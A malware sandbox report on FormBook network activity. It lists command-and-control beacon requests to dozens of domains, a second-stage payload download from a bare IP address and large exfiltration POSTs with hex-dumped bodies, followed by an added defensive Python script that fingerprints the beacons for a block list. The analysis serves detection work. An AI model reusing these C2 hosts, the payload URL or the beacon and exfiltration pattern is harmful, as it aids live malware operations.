      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=yjfI2G6e1NNBAcNwf2tUqaLPoUBpdm8yTjWTyxe7KeTIHUL6pmFc2VipWP6oHfDUS3nB HTTP/1.1Host: www.vertuminy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=tu4Fqrl03j3XKh2uqBx60Zos9k5v6uCXeSay1AldAEtNuUAzALs+TfOlBEIAtEUGtRXr&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.newhousebr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=vygEhc5xglj1G3JS6VTWPJeN725RXGvf61z4/vCmH17Sx0DgX8UOPYydl02519zwEgP2 HTTP/1.1Host: www.sasanos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=li6SsHqzKBnzycM97bdG5wRCKEM4cJfC0WAWBaAxs6ySFTHgzY96rSxPQvpbgU0eJWWh&BRoTP=zL08qvv0B HTTP/1.1Host: www.shineshaft.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?BRoTP=zL08qvv0B&6l=VMcwVBLwqRmVPytNF8JC9V+QbrAqXwP56LqTLWjMNjFaseDfnr91cG/bxuQAeKeOquTi HTTP/1.1Host: www.catfuid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=9ahEnHZZeTxRBFCFdhWsn/rXQiL42ezX5RWAdN98xlMO3sdn1fm/KWR3GQxJy3wCgk19&BRoTP=zL08qvv0B HTTP/1.1Host: www.dxxlewis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=T/FvhneNnjTkpKq8gTZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHel8XAWeHdj0&BRoTP=zL08qvv0B HTTP/1.1Host: www.loccssol.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?BRoTP=zL08qvv0B&6l=Vx4H34AayF477+esMD1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPncmjSt73wdG HTTP/1.1Host: www.emilfaucets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=TXWnycs6/xJ2/7UJodGMQUHmzvUS8Ow5bewKdkxBVVL02ReSU1pZ67Rw0pG+5oZumuDm&BRoTP=zL08qvv0B HTTP/1.1Host: www.6233v.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=Rsl6eVz5VGvHVfgxyoYLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptOS9cmQPTpc HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?6l=6MB9xBzUNYGaB0HC2KSWe5N1d03fCSQj95knWB3UNGHVRW9fsCNX3pl6ckQ6rxP1ajrJ&FZ=o87TchT09DMdG270 HTTP/1.1Host: www.philme.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270&6l=Nq7JSK++1Viv3o+cV3L9p1r/W1Jbb2TTrm4azGTrFosPABOSrSYj/6inrnIMRCxFDXmr HTTP/1.1Host: www.andajzx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 52.206.159.80 52.206.159.80
Source: unknown | Network traffic detected: DNS query count 33
Source: global traffic | HTTP traffic detected: GET /bin_txbkK174.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 45.137.22.91 | Cache-Control: no-cache
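The findings above have the shape that makes FormBook beaconing easy to fingerprint: every GET uses the same URI path (/b2c0/), every GET carries the same parameter name (6l) holding a base64-like blob, and the second parameter name changes between request rounds (FZ, 5j6, a2M, BRoTP) while its value stays fixed within a round. The GET body is seven null bytes. The one GET with no query string is the loader fetching its second stage from a bare IP with an IE11 User-Agent, and the POSTs that follow (Content-Length 131140, form-urlencoded) go to a subset of the beacon hosts with a body whose hex dump begins 36 6c 3d, i.e. "6l=". The script below is an added example, not part of the Joe Sandbox report: it parses findings in the report's collapsed layout (one header running straight into the next, as in "HTTP/1.1Host: www.example.comConnection: close"), recovers that fingerprint, lists the beacon hosts and payload fetch, and checks that the decoded POST body uses the same parameter name. The sample lines are constructed from the findings above, with the POST hex cut to its first 15 bytes; it uses only the Python standard library.

```python
"""Profile FormBook-style C2 beacons from sandbox network findings (added example)."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import urlsplit

HDR_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.1")
# Host values in the report are lowercase and the next header name begins with
# a capital letter, so a lowercase class stops exactly at the host boundary
# even where the extraction dropped the line break between headers.
HOST_RE = re.compile(r"Host: ([a-z0-9.-]+)")
RAW_RE = re.compile(r"Data Raw: ((?:[0-9a-f]{2} )*[0-9a-f]{2})")

# Constructed sample in the shape of the findings above: two GET beacons, the
# GuLoader second-stage download and one exfil POST. The POST hex is cut to
# its first 15 bytes; the real request carries Content-Length: 131140.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: GET /b2c0/?FZ=o87TchT09DMdG270"
    "&6l=yjfI2G6e1NNBAcNwf2tUqaLPoUBpdm8yTjWTyxe7KeTIHUL6pmFc2VipWP6oHfDUS3nB HTTP/1.1"
    "Host: www.vertuminy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /b2c0/?6l=HN6lmWApQ/aLTtz3n1Rw"
    "rlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9svXHAom8ed&5j6=j0GP HTTP/1.1"
    "Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:",
    "Source: global trafficHTTP traffic detected: GET /bin_txbkK174.bin HTTP/1.1"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
    "Host: 45.137.22.91Cache-Control: no-cache",
    "Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1"
    "Host: www.carts-amazon.comConnection: closeContent-Length: 131140"
    "Content-Type: application/x-www-form-urlencoded"
    "Data Raw: 36 6c 3d 49 50 4f 66 34 77 6f 5f 51 71 71 37",
]


def parse_line(line: str) -> Optional[dict]:
    """Split one finding into method, host, path, raw query pairs and body bytes.

    The query is split by hand rather than with parse_qsl so that '+' and '/'
    inside the base64-like values survive untouched.
    """
    m = HDR_RE.search(line)
    if not m:
        return None
    method, target = m.groups()
    parts = urlsplit(target)
    params = [kv.partition("=")[::2] for kv in parts.query.split("&") if kv]
    host = HOST_RE.search(line)
    raw = RAW_RE.search(line)
    body = bytes.fromhex(raw.group(1).replace(" ", "")) if raw else b""
    return {
        "method": method,
        "host": host.group(1) if host else None,
        "path": parts.path,
        "params": params,
        "body": body,
    }


def profile_beacons(records: list) -> dict:
    """Recover the campaign fingerprint from the GET beacons: one constant URI
    path, one parameter name present in every request (the encrypted client
    data) and a second name that rotates between request rounds."""
    gets = [r for r in records if r["method"] == "GET" and r["params"]]
    key_sets = [{k for k, _ in r["params"]} for r in gets]
    common = set.intersection(*key_sets) if key_sets else set()
    rotating = set().union(*key_sets) - common if key_sets else set()
    paths = Counter(r["path"] for r in gets)
    return {
        "path": paths.most_common(1)[0][0] if paths else None,
        "data_param": sorted(common),
        "rotating_params": sorted(rotating),
        "hosts": sorted({r["host"] for r in gets if r["host"]}),
    }


def post_uses_same_param(record: dict, data_param: str) -> bool:
    """Decode the POST hex dump: the form body should begin with the same
    '<data_param>=' as the GET beacons, tying the exfil to the beacon rounds."""
    prefix = f"{data_param}=".encode()
    return record["method"] == "POST" and record["body"].startswith(prefix)


def payload_fetches(records: list) -> list:
    """GETs without a query string are not beacons; in this run it is the
    loader pulling the encrypted second stage from a bare IP."""
    return [(r["host"], r["path"])
            for r in records if r["method"] == "GET" and not r["params"]]


if __name__ == "__main__":
    recs = [r for r in map(parse_line, SAMPLE_LINES) if r]
    prof = profile_beacons(recs)
    print(prof)
    print(payload_fetches(recs))
    for r in recs:
        if r["method"] == "POST":
            print(r["host"], r["body"], post_uses_same_param(r, prof["data_param"][0]))
```

Run it against the full list of findings rather than the four sample lines and the host list becomes the block list for this sample; note that FormBook beacons every domain in its embedded list, so only the hosts that also receive a POST (here the 5j6 round) are confirmed live, the others may be decoys or parked domains.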
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.carts-amazon.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.carts-amazon.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.carts-amazon.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 49 50 4f 66 34 77 6f 5f 51 71 71 37 49 73 7a 78 6c 67 63 64 72 44 6f 35 41 72 37 77 69 6e 71 52 48 71 50 45 4b 38 77 64 54 43 65 54 5a 36 7e 59 38 79 53 6b 47 78 63 4c 38 4d 45 6a 51 7a 59 64 6d 76 57 47 30 79 4d 66 50 43 4c 66 6d 4b 38 67 4d 74 74 52 44 78 55 35 35 75 4f 57 42 78 4e 4a 32 37 74 73 68 45 51 33 70 57 74 35 4b 42 50 6f 54 65 48 72 6f 78 58 49 36 72 67 6a 4b 4a 35 47 72 6f 6f 74 33 69 52 78 38 77 48 58 47 54 64 47 37 77 72 41 28 57 6c 31 30 50 7e 36 61 4c 48 59 64 73 74 63 54 62 46 51 51 32 50 74 62 39 4a 42 33 65 41 71 48 79 75 6f 70 4f 74 4c 43 62 49 2d 50 67 56 37 53 6a 65 68 36 35 69 72 51 58 48 57 4e 43 78 4d 58 76 67 55 4a 67 36 73 58 77 48 51 4f 43 48 75 4a 75 4f 6a 38 58 63 41 6f 55 49 69 7a 44 4a 37 6e 6b 4d 48 71 4e 6a 51 6f 4d 58 47 31 76 4f 5f 33 43 32 38 44 50 35 53 58 34 43 4f 52 31 34 44 6f 41 65 63 67 4b 33 4d 37 51 28 72 66 51 57 35 36 53 55 6d 50 7a 50 68 58 5a 28 77 4c 70 6c 68 58 4d 4c 52 59 56 34 50 78 38 4c 71 55 39 49 30 70 38 76 6b 30 39 70 6a 57 71 6a 49 68 50 4e 6f 4a 6d 7e 5a 66 33 30 4d 47 57 65 4e 50 4f 77 51 63 6b 47 6e 74 4f 34 4f 54 50 7e 51 63 74 51 57 45 4c 41 59 5a 61 37 74 68 68 48 4c 62 57 72 62 62 58 35 68 35 5f 43 76 6c 77 4e 71 58 30 66 41 6d 4b 7a 71 47 57 53 67 4e 35 69 79 6b 42 76 6e 77 4d 4b 55 78 34 78 2d 7a 63 38 4a 49 6d 54 48 41 30 77 75 4e 4a 4a 46 48 41 32 4c 6e 41 56 72 6c 4f 64 31 59 6c 73 4b 45 4a 65 57 56 64 6b 73 6a 33 30 4e 57 51 32 4c 43 68 63 6e 69 6d 68 52 41 54 54 4c 73 42 6a 5a 4e 51 71 62 63 74 43 76 54 57 4f 49 38 74 5a 4d 28 76 62 4a 47 66 62 6f 
76 45 6d 6f 77 4e 78 49 6b 52 7a 45 71 70 35 74 67 41 5a 50 48 79 6b 34 56 62 70 35 31 38 39 4b 71 6b 45 46 30 35 4e 5f 28 42 51 49 36 38 53 71 6b 34 47 41 57 5f 77 30 73 4b 47 6e 44 50 31 4c 32 71 56 30 74 30 6a 5f 63 51 64 6f 46 70 31 77 54 6f 50 53 6f 48 68 57 62 72 78 51 39 75 6e 65 45 54 45 44 46 7a 37 51 4a 4b 30 43 73 36 7a 4d 37 73 67 54 6a 4c 6f 6a 74 6b 42 57 4c 79 71 33 4b 34 70 4b 48 32 6a 6c 43 6c 6e 71 5a 4e 6b 39 74 34 55 71 43 6e 51 33 45 55 71 54 68 4d 68 74 70 70 35 6d 6c 58 77 74 66 52 65 73 4d 4d 5a 4b 36 6a 51 55 6a 38 34 62 75 43 31 4f 51 61 78 59 70 52 67 2d 50 43 42 4a 68 59 31 57 70 54 39 50 30 30 61 6e 7e 43 46 34 45 63 33 4e 52 62 4a 53 45 4a 6a 51 44 2d 53 50 35 68 48 30 7e 6d 39 79 45 51 4d 46 69 57 62 79 62 74 59 4b 6a 30 57 68 33 54 4b 4c 79 65 38 66 46 4c 42 62 54 59 37 74 6c 65 37 73 47 74 44 56 67 4e 41 7a 28 4a 33 6f 42 78 62 48 6c 63 55 79 7a 5a 47 76 43 63 7e 71 58 77 32 6f 65 5f 31 73 4f 56 38 5a 73 50 77 77 50 4f 34 65 58 32 64 36 64 49 4c 6e 42 33 75 48 75 30 4a 45 78 48 34
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.arroundworld.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.arroundworld.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.arroundworld.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 49 69 62 35 72 51 63 68 53 36 35 5a 6d 51 77 2d 5a 6c 31 30 4b 73 43 78 33 31 79 69 66 32 62 5f 6c 72 38 4d 33 75 55 5a 4e 6a 35 38 70 58 73 53 65 76 65 4e 34 46 69 56 6e 64 4f 70 5a 70 64 68 79 5f 6b 5a 45 71 6c 41 64 36 35 66 78 72 79 70 47 6e 54 67 53 66 33 61 4b 38 62 2d 59 75 62 30 33 64 69 69 65 65 43 39 45 32 59 41 39 41 43 44 62 75 54 4e 37 48 68 62 79 44 55 77 31 41 6c 6a 48 78 28 52 49 38 74 58 37 74 41 6f 54 37 47 43 34 33 7a 72 73 34 69 5a 6b 30 78 78 33 50 7e 68 43 73 69 45 46 4e 61 61 58 69 58 4d 6e 4a 38 52 51 64 57 4d 42 4b 36 73 30 48 46 41 54 6e 69 4e 31 5a 58 5a 6c 70 77 48 6f 6f 47 74 48 70 47 64 35 4a 72 6e 5a 42 66 36 43 31 4b 55 79 6f 61 64 28 39 7a 47 48 35 57 34 34 6a 73 71 6f 74 70 61 35 74 46 4a 58 50 6a 59 71 79 31 49 44 6e 65 39 39 38 38 6e 35 68 35 56 47 2d 49 59 64 2d 44 36 6e 6c 48 4b 64 39 6e 4e 34 52 33 65 49 64 4f 4e 76 47 45 67 52 45 75 66 76 58 66 78 28 50 70 46 73 68 49 78 7e 6a 31 53 4e 5f 4f 38 43 54 34 73 33 65 62 7a 6a 44 6d 73 31 6d 67 38 41 66 58 78 38 36 45 47 4e 39 63 2d 66 42 45 32 32 4a 4f 36 59 6c 67 34 50 4a 6d 78 33 73 57 56 58 75 77 57 6b 6d 77 33 73 35 62 45 7a 4a 47 73 5a 68 42 5a 70 4f 32 45 34 6f 38 39 71 47 58 6b 77 4a 34 6a 32 2d 43 6d 44 55 6b 50 78 66 52 36 67 6f 53 65 72 32 62 65 45 53 41 54 51 44 77 4e 28 34 49 6e 6a 32 41 4d 32 63 70 66 48 57 6a 6b 78 48 76 56 64 6f 50 65 57 61 35 6c 55 6f 74 58 55 52 63 73 68 31 66 6f 5a 4d 46 56 53 4e 45 42 50 68 34 66 34 71 51 61 4b 78 59 77 45 52 7e 5a 69 45 71 69 46 62 45 64 28 57 45 69 48 33 47 55 59 39 38 34 45 37 35 57 
67 54 38 4a 62 56 66 48 7a 6a 43 71 6d 53 59 5f 6f 36 76 58 4f 39 4f 57 7e 73 77 76 30 5a 49 33 77 4d 6f 75 43 66 6f 6e 4c 71 51 74 64 43 62 41 54 4d 48 38 44 7a 36 47 4d 6d 51 69 28 6e 72 42 76 31 50 53 73 2d 72 70 4f 6a 46 6e 66 65 76 44 78 73 46 48 68 65 72 4b 38 4c 76 5a 59 6c 6c 68 50 2d 28 4f 31 71 4e 5f 34 30 63 71 63 76 72 6a 47 76 79 71 78 6a 70 55 34 32 56 77 37 4b 33 6c 56 61 6c 30 38 66 32 79 73 30 67 4b 58 6c 44 2d 36 50 6a 51 45 35 44 49 75 39 31 47 58 4d 53 5f 76 37 6d 69 70 76 6a 65 4a 74 50 39 49 58 6e 62 32 59 55 44 48 57 66 39 4d 2d 31 38 63 6c 74 69 72 61 76 38 33 41 62 79 6f 59 55 73 45 30 4f 6c 42 7a 55 72 59 43 73 32 69 57 61 53 53 56 75 65 48 75 48 31 4e 77 35 45 64 6a 62 73 4b 5a 4e 56 57 32 61 54 6f 71 30 5a 5a 74 5a 54 37 32 53 4d 57 78 62 74 76 5f 6a 6f 6e 73 70 6d 59 6c 37 56 6c 2d 66 41 43 57 6f 6e 71 2d 78 39 31 44 34 76 78 73 47 36 6b 6c 57 58 68 63 45 52 62 44 28 7a 50 6a 65 4d 37 55 6c 58 4d 43 72 4c 50 4e 61 34 78 4f 7a 59 72 58 32 36 62 49 38 58 64 42 7e 66 6b 56 46 65 28 6d 48
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.hi-loentertainment.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.hi-loentertainment.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hi-loentertainment.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 75 38 5a 30 70 67 52 59 56 78 78 79 7a 63 57 51 7e 74 50 55 66 53 72 33 47 56 4e 68 28 61 4c 46 41 50 54 79 30 52 6a 7a 5a 4e 42 75 79 48 34 46 6f 4f 37 4a 68 32 76 4b 76 5f 55 59 62 70 38 59 6b 69 4d 48 39 6b 49 61 46 53 46 30 43 65 64 2d 4a 4b 6b 51 56 6b 79 68 47 35 42 4b 4f 55 74 5a 75 50 47 61 39 70 30 43 41 69 44 38 50 44 69 30 28 66 32 4e 32 4c 76 37 54 53 6c 44 37 58 33 6b 5a 4b 46 62 79 6a 6f 54 6e 30 68 4a 4b 55 37 74 44 4b 55 57 49 67 69 58 51 54 54 32 73 44 46 2d 4e 65 4c 57 69 6e 6b 76 52 64 30 78 50 6d 48 65 36 2d 41 64 6f 35 59 48 61 39 6b 67 73 52 67 51 48 37 42 4d 64 53 6a 4e 36 42 6c 35 53 49 31 6a 64 5a 65 65 37 39 47 35 70 79 39 72 45 43 4b 44 7a 65 4d 34 66 39 59 44 79 71 32 71 73 65 43 4b 74 61 51 46 52 66 77 45 79 49 65 44 4f 52 42 46 4f 31 6c 68 4c 70 69 36 61 78 67 38 66 66 49 50 64 53 4b 44 36 72 6e 78 64 6f 51 6b 50 6f 33 67 28 53 6e 51 73 45 69 68 70 6f 39 31 77 67 56 5a 62 2d 28 7a 45 42 45 58 69 75 67 41 52 48 6d 4e 42 48 47 5f 28 55 5a 42 4b 79 49 52 7a 54 31 5a 4f 58 65 32 57 47 46 4d 61 45 28 61 41 57 6f 75 38 4c 72 38 49 65 4d 49 63 73 61 70 51 44 72 6d 31 43 76 78 5a 2d 36 77 50 62 35 6f 4a 45 32 4f 56 5f 70 5a 28 50 32 47 5a 6b 49 61 4f 54 34 4f 5a 39 6c 31 49 37 4c 7a 63 4b 4c 71 68 73 68 68 6b 46 76 71 4f 42 72 30 54 79 79 48 74 61 69 50 62 69 4b 78 67 4c 62 6a 57 78 70 4b 49 65 69 74 77 30 59 5a 36 6e 5a 77 30 6c 7a 66 34 6f 36 42 63 4a 61 5a 6b 7a 69 61 63 6f 47 41 73 62 4d 67 68 39 55 46 34 4d 65 72 28 57 55 6d 28 61 39 33 45 65 69 41 53 64 4a 66 66 42 61 50 5a 56 
6e 5f 79 66 4a 38 42 4c 59 57 73 77 33 39 67 6d 65 63 70 49 63 70 79 70 48 45 7e 46 34 46 35 31 6c 6e 70 58 71 34 39 47 39 67 45 30 61 4a 4e 79 62 36 73 6a 46 42 47 72 66 59 36 38 76 44 44 71 79 68 38 6c 57 69 42 49 70 61 48 34 39 6f 7a 6b 56 74 76 38 66 47 69 66 67 77 59 68 59 2d 67 67 47 43 6d 49 70 4e 6a 5f 58 77 4b 4c 4f 51 68 71 34 41 46 53 6d 48 78 6e 46 4e 67 4b 47 2d 67 70 41 34 6d 46 32 32 7a 69 54 58 6c 6c 33 31 77 78 28 6b 63 56 6a 64 63 36 64 73 56 38 34 36 62 52 6a 38 54 6d 75 37 6f 71 45 4e 56 5f 47 64 6f 75 6c 67 45 37 4c 38 68 48 72 4c 66 77 34 33 33 51 6c 56 6d 39 62 49 52 6c 6b 47 36 58 6e 61 51 45 4d 7a 45 4c 28 4b 6e 4f 73 37 5a 71 28 5a 78 62 41 5f 41 50 30 5a 73 32 41 52 50 36 43 5a 4f 46 42 65 72 42 56 42 4e 46 70 78 64 78 6d 52 77 62 77 30 74 69 6f 7a 41 4a 7e 4a 78 44 75 46 57 64 39 54 75 45 73 50 6a 7a 43 48 61 4d 44 44 34 34 58 4a 6f 6d 75 71 5a 52 69 76 48 52 6f 50 70 74 7e 47 5a 2d 61 46 65 30 6b 48 32 77 72 43 4b 76 58 73 58 79 46 62 35 46 57 30 4f 62 68 53 36 67 46 6a 48 66 47 68 72
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.aydeyahouse.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.aydeyahouse.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aydeyahouse.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 4e 49 36 30 68 52 71 6d 43 43 54 46 68 69 79 44 73 30 63 53 47 70 48 30 39 6a 77 62 42 70 78 76 44 68 30 6f 62 48 36 5a 44 65 35 74 46 69 4b 59 78 37 72 54 44 73 59 68 54 61 4f 46 61 35 46 31 4e 34 49 56 36 5f 66 6b 69 52 4e 61 58 79 75 66 4b 48 4e 68 62 41 56 56 4e 66 54 59 5a 45 6f 43 43 49 46 4d 53 6e 50 62 6c 6e 31 51 73 49 68 6e 53 6e 77 68 37 6c 58 38 67 43 70 34 6a 46 64 38 58 43 37 70 70 56 6d 51 43 76 37 45 4a 32 4f 39 34 52 64 31 48 73 47 6c 67 77 32 36 28 2d 69 33 63 77 45 35 57 69 37 56 4e 38 4d 45 49 74 36 34 6a 72 49 71 4e 45 68 54 45 6c 4d 6b 6d 36 76 2d 38 63 4f 30 46 70 57 6a 52 71 4e 53 4e 36 36 5f 41 75 4d 34 7a 37 52 78 28 74 41 32 76 45 66 75 69 78 77 4f 68 30 58 2d 76 2d 6a 35 47 38 6f 6a 41 76 70 65 43 35 34 37 6c 64 5a 6e 70 78 4e 43 55 76 76 47 28 46 77 50 6d 50 49 61 6d 6d 57 66 78 64 78 44 45 6a 7a 4c 54 53 31 77 47 41 6a 33 46 64 36 70 6b 66 34 66 7e 4a 78 42 67 70 57 65 57 46 64 68 53 79 53 36 44 41 76 67 7e 50 6e 2d 79 31 74 55 55 6b 33 32 66 5f 65 5f 67 4a 42 47 43 4e 79 35 4f 5a 61 76 51 37 4e 30 37 76 53 76 30 4f 37 76 6f 58 43 55 4b 49 68 77 4a 57 74 61 6b 5f 38 78 28 58 79 4e 78 55 64 6a 6d 50 59 38 75 67 51 30 39 44 4d 6b 52 45 72 4f 4f 6e 57 5f 39 69 39 6d 54 73 49 75 79 45 36 49 71 42 7e 30 35 4b 36 69 35 61 66 4c 67 4a 54 63 68 4d 72 33 52 37 4b 38 6c 42 6b 34 61 69 65 2d 66 4b 79 54 30 41 31 57 63 62 7e 5a 64 4c 65 33 33 75 71 64 6b 54 56 75 52 50 68 59 71 2d 6a 6f 63 75 34 71 79 4e 56 44 39 74 4c 63 49 42 64 6e 69 48 72 37 5a 48 34 48 7a 30 49 5f 38 74 39 66 55 5a 76 54 70 30 4d 56 5a 
61 51 71 34 4e 48 44 6a 6f 39 62 74 70 64 34 70 62 72 41 43 4e 4c 37 49 55 76 7a 61 51 6a 2d 58 75 61 51 74 6a 52 51 67 77 75 63 4d 6c 43 68 44 65 55 5f 65 5a 46 62 6a 37 39 74 35 50 62 6f 7a 55 66 77 57 5a 44 65 5a 70 76 38 6d 52 56 73 39 58 4f 5a 4b 67 6e 70 52 62 31 71 51 44 7e 54 79 4e 61 71 4c 72 51 37 73 74 64 52 6c 50 48 47 67 74 41 4e 66 49 38 72 74 4d 41 5a 63 5f 4c 6e 66 54 45 36 30 37 36 48 41 45 58 70 68 6d 42 76 7e 62 6a 59 30 58 6e 57 63 6c 65 67 67 33 28 48 79 63 7a 47 78 52 53 48 78 43 78 57 68 5a 55 52 51 34 69 68 39 63 32 31 61 4a 33 59 49 75 7a 53 71 33 35 5f 63 70 32 66 65 58 69 71 30 48 38 70 77 5a 6d 67 56 37 70 37 41 71 34 33 76 37 4c 32 28 62 64 36 46 6c 6c 57 73 34 5a 50 61 74 32 4c 79 63 62 76 55 43 76 31 42 41 31 67 35 37 72 63 74 76 32 62 67 4d 6d 5a 59 34 61 7a 56 49 62 42 4a 69 5a 59 6f 37 41 69 4a 6d 30 57 28 7a 4b 75 6e 70 48 38 6a 77 47 43 51 30 4a 6d 6c 38 36 49 6d 69 50 37 7a 65 6b 70 79 37 49 59 6f 67 57 36 4a 4a 49 72 37 7a 55 50 39 6a 32 69 45 49 78 44 28 64 4e 4f 71 57 31 6a
      Source: global trafficHTTP traffic detected: POST /b2c0/ HTTP/1.1Host: www.itpronto.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.itpronto.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.itpronto.com/b2c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 3d 79 73 4b 5f 34 54 6d 4a 4b 7a 50 5a 78 4d 38 33 67 76 70 6d 6b 6b 4b 46 67 77 32 4d 6d 5a 70 63 30 42 6b 36 30 44 45 75 64 67 63 7a 45 65 45 74 4b 77 75 6a 76 36 31 53 4d 44 7e 71 45 49 43 71 34 55 4a 75 43 6b 33 55 4c 6d 79 4c 4c 57 42 33 7e 2d 68 31 71 6a 7e 78 78 61 43 65 65 58 67 31 56 38 42 57 28 68 53 5f 33 56 6c 33 39 4c 6c 36 6a 68 4d 6f 57 58 41 43 55 41 48 71 5a 63 42 74 74 41 79 67 6e 48 74 77 6b 6b 41 36 4b 2d 53 6a 61 45 42 6d 55 31 50 35 35 77 4c 43 76 47 34 65 55 30 65 37 59 64 55 51 6c 7a 76 78 59 52 62 38 4e 65 7e 57 32 36 66 79 72 46 6b 78 4d 73 42 79 67 56 78 4f 79 75 7e 78 78 5f 52 32 6d 4f 32 4e 73 71 5a 4b 4f 75 30 2d 69 4b 51 54 61 57 57 35 41 74 4a 51 71 38 6f 57 74 7a 78 34 6d 56 48 32 67 7a 51 58 4c 6d 68 61 33 70 74 75 4a 63 5a 50 47 34 46 39 53 51 4b 31 64 71 59 41 34 32 6c 70 4c 50 53 4c 62 6f 5a 69 4d 44 4d 55 78 6a 6e 4e 4b 52 43 54 52 69 66 79 6c 68 28 75 39 61 4f 51 6e 4a 58 46 4c 77 59 30 33 64 6b 5a 62 44 7e 5a 53 44 67 34 7a 32 31 63 64 6e 6a 47 35 58 63 4e 76 49 53 48 61 6e 52 57 54 52 58 5a 55 57 70 38 67 6f 33 31 72 33 78 37 4f 72 6e 6b 72 49 72 5f 5a 44 28 78 47 54 72 5a 7a 64 72 34 64 33 49 42 4f 64 62 6b 4d 56 76 65 32 77 69 6b 4f 31 68 38 32 76 30 78 6d 56 6b 54 4a 56 63 79 28 46 6f 42 64 64 30 38 7e 64 37 35 6e 66 49 69 53 70 61 43 44 32 47 49 48 58 6f 6b 32 41 6a 32 4e 39 47 58 7e 4d 31 4d 66 31 41 4b 77 63 63 66 39 76 7a 41 76 54 45 63 35 52 72 6a 4e 5a 35 33 6d 38 38 6d 30 44 71 4d 74 64 6e 5f 51 53 54 57 79 65 48 36 77 70 74 66 39 38 5a 53 6d 2d 30 6a 72 7a 64 61 42 5a 50 57 56 4b 75 50 
